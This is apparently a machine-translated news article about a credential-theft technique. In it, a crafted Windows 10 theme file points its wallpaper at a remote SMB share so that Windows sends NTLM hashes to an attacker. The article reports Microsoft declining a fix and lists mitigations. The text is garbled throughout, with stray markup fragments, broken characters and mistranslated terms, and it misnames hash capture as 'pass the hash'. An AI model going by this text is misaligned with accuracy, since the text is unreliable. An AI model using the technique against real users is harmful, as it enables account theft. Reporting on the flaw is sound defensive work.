Win 10 topics can be used to steal password, Microsoft refuses to repair

The researchers found that the carefully forged windows 10 theme and theme package can be used in the pass the hash attack to steal Windows account credentials from the victims p> Introduction to windows 10 theme Windows system allows users to create customized themes with customized colors, sounds, mouse operations and wallpaper for the operating system. Windows users can then choose between different themes to modify the appearance of the operating system p> Modify windows theme the settings of the theme are saved in the% appdata% Microsoft windows themes folder In the file of theme extension, such as customdark theme¡£ p> windows 10 theme file users can also right-click to select the active theme and select ‘save theme for sharing’ to share the current theme with other users. At this time, the theme will be packaged as a ‘ Deskthemepack ‘file p> then you can analyze the desktop theme package by mail or download, and double-click install p> steal windows credentials using custom theme files last weekend, security researcher Jimmy Bayne (@ bohops) found that carefully forged windows themes can be used to perform pass the hash attacks p> pass the hash attack is an attack that steals the windows login name and password hash value by enticing users to access the remote SMB share requiring authentication p> when accessing remote resources, windows will automatically log in to the remote system by sending NTLM hash values of Windows user login name and password p> in pass the hash attack, the sent credentials will be obtained by the attacker, and then the attacker can de hash the password hash value to obtain the password, which is used to access the victim’s user name and password login p> bleepingcomputer test found that it only takes 4 seconds to crack a simple password hash value p> 4 seconds to crack NTLM hash value in the new method found by Bayne, an attacker can create a carefully forged Theme file, modify the desktop wallpaper to use the source requiring remote authentication, as shown in the following figure: malicious windows theme file when Windows tries to access the remote resources requiring authentication, it will automatically log in to the remote share by sending the NTLM hash and login name of the current login account p> automatically log in to the remote shared file then, the attacker can obtain the certificate and convert the NTLM hash value into plaintext through a special script, as shown below: obtain the windows certificate pass the hash attack will send the user to log in to the Windows account, including the Microsoft account, so this kind of attack has great potential harm p> moreover, Microsoft began to migrate local windows 10 accounts to Microsoft accounts. Remote attackers can easily access remote services provided by Microsoft, including mailbox, azure and remote enterprise network p> Bayne said that the vulnerability was submitted to Microsoft earlier this year, but Microsoft said it belonged to & quot; feature by design”£¬ Therefore, it will not be repaired p> how to deal with malicious theme files Bayne recommends that users intercept or re associate theme¡¢. Themepack and Extending desktopthemepackfile to other applications can break the theme of windows 10. In addition, Windows users can also configure a group policy named ‘Network Security: restrict NTLM: outgoing NTLM traffic to remoteservers’ to’ deny all ‘, which can prevent NTLM hash values from being sent to remote hosts. But depending on the configuration, you will cause some problems in using remote sharing in the enterprise environment p> finally, bleepingcomputer recommends that users open multi factor authentication for Microsoft accounts to prevent remote access after attackers successfully steal credentials p>